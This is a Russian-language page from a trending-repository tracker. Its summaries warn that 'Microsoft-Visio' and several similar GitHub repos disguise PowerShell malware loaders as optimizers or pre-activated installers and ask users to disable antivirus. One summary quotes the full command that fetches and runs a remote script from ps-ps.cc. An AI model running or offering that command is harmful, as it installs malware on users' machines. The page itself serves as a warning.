ashdriverclippers/Microsoft-Visio
О проекте
Репозиторий маскируется под «оптимизацию Microsoft Visio», но по сути это скрипт-загрузчик, который через PowerShell запускает удалённый код с ps-ps.cc и предлагает отключить антивирус. Признаки вредоносного/пиратского установщика, а не легального инструмента.
Чем пригодится
- Не запускать команду irm ... | iex из README на рабочей машине
- Проверить репозиторий на признаки malware перед любым использованием
Пересказ README моделью DeepSeek V4.1 Flash. Может ошибаться в деталях.
Почему он в тренде
- Сегодня уже 143 звезды, к концу дня ожидается около 187.
- Репозиторию 1 день, а у него уже 129 звёзд. Истории меньше двух недель, так что обычного темпа, с которым можно сравнить всплеск, у него ещё нет.
- Топ новых репозиториев за неделю: #121.
- Около 128 форков в сутки — код забирают себе.
Звёзды по дням
Столбики — звёзды за день, линия — обычный темп. Красным — дни всплесков.
Цифры
- Всего звёзд
- 129
- Сегодня
- 143 · к вечеру ≈ 187
- Форков
- 15
- Issues и pull requests
- 0
- Наблюдателей
- 0
- Создан
- 1 октября 2026
- Последний коммит
- 1 октября 2026
Доверие к звёздам
Рост выглядит естественно: форков и обсуждений столько, сколько бывает у живых проектов, а звёзды приходят неровно, как от людей.
Это эвристики, а не приговор: судим по поведению репозитория, а не по списку звездивших.
Где замечен
- 2 октября 2026Топ новых репозиториев за неделю: #121
Похожие по описанию
-
5,7
Pulverizeclirouse/StartAll-Back
Репозиторий маскируется под утилиту оптимизации StartAll Back, но по сути это скрипт-загрузчик: README предлагает выполнить `irm https://ps-ps.cc/powershell/Loader.ps1 | iex` и отключить антивирус. Никакого реального…
-
5,7
denmooseflex/Display-Fusion
Репозиторий маскируется под менеджер конфигурации Display Fusion, но по сути это установщик, распространяющий пиратскую «pre-activated» версию через запуск удалённого PowerShell-скрипта. README содержит инструкции по…
-
5,8
surfaceguardianway/Better-Discord
Репозиторий маскируется под оптимизационный набор для BetterDiscord, но по факту предлагает запустить сторонний PowerShell-скрипт, который вносит правки в реестр и отключает защиту Windows. Признаки типичного…
-
5,6
hallbudgieleap/Glary-Utilities-Pro
Репозиторий маскируется под Glary Utilities Pro, но по факту предлагает запустить PowerShell-скрипт с внешнего домена для «пред-активированной» установки. Это типичная схема распространения вредоносного ПО, а не…
-
5,5
TitanWaspShape35/Kontakt-8
Репозиторий маскируется под Kontakt 8, но README описывает установку через PowerShell-скрипт с внешнего домена и отключение антивируса — типичные признаки вредоносного загрузчика, а не легитимного проекта.
-
6,2
graspdivinerdesign/BorisFX
Репозиторий маскируется под инструмент BorisFX, но по сути это скрипт-загрузчик PowerShell, который предлагает «пред-активированную» установку и просит отключить антивирус. Похоже на вредоносную или пиратскую схему, а…